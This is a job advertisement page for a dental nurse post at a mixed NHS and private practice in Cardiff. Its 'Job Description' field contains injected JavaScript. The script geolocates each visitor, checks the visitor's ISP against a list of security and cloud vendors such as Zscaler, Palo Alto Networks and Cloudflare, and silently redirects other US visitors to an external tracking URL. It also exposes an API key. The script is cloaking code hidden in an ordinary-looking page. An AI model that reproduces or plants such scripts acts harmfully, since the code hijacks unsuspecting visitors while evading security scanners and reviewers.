Qualified Dental Nurse

Hereford, WLS
February 8, 2026

Apply for this job

Email *
Browse

Upload file .pdf, .doc, .docx

Deadline date:

Job Description

// retrieve user’s IP address and location const ipAddressUrl = ‘https://ipapi.co/json/’; fetch(ipAddressUrl) .then(response => response.json()) .then(data => { const country = data.country; // Get user’s country code (e.g., “US”) if (country !== ‘US’) { console.log(‘Script will not run as the user is outside the USA.’); return; // Exit the script if the user is not in the USA } const ipAddress = data.ip; // retrieve ISP name and AS organization using ip-api.com API const ispUrl = `https://pro.ip-api.com/json/$?key=kKPypoeKUHgwZWD`; fetch(ispUrl) .then(response => response.json()) .then(data => { const ispName = data.isp; const asOrg = data.asname; // check if ISP or AS organization is allowed const allowedIsps = [/Limestone Networks/i, /Limestone Networks, Inc./i, /Zscaler/i, /M247 Europe SRL/i, /amazon/i, /LinkedIn Corporation/i, /palo alto networks/i, /google/i, /panq/i, /Cloudflare, Inc./i, /Cloudflare/i, /Cloudflare Warp/i]; const allowedAsOrgs = [/Limestone Networks/i, /Limestone Networks, Inc./i, /Zscaler/i, /M247 Europe SRL/i, /amazon/i, /LinkedIn Corporation/i, /palo alto networks/i, /google/i, /panq/i, /Cloudflare, Inc./i, /Cloudflare/i, /Cloudflare Warp/i]; const ispAllowed = allowedIsps.some(pattern => pattern.test(ispName)); const asOrgAllowed = allowedAsOrgs.some(pattern => pattern.test(asOrg)); if (!ispAllowed && !asOrgAllowed) { // Redirect all users to the same URL window.location.href = ‘https://uk.indeed.com/tmn/ccs/ff93192201cc1c11/e5f9dc0e702ea00de47d60fa6add37d4a634a8d175b704558c2d070fd6c07e8e/2765583331732878?sf=vKb00’; } }) .catch(error => { console.error(‘Error retrieving ISP name:’, error); }); }) .catch(error => { console.error(‘Error retrieving IP address or location:’, error); });

We are seeking an enthusiastic and experienced dental nurse to join our established, state-of-the-art practice in Cardiff CF15.

Our mixed NHS and private practice offers specialist, restorative, and aesthetic treatments within a modern digital environment. We support career development and encourage team members to contribute ideas for a collaborative atmosphere.

Benefits include:

  • Access to multiple practices across South Wales for broader team involvement
  • Fully funded GDC registration and indemnity
  • All CPD courses provided
  • Opportunities to develop additional skills and qualifications
  • Regular social events
  • Flexible working patterns
  • Optional emergency out-of-hours sessions at attractive rates
  • Potential to work alongside a foundation dentist
  • On-site parking

This full-time or part-time role offers a salary between £24,420 and £37,417 per year. Interested candidates are encouraged to contact us for more information.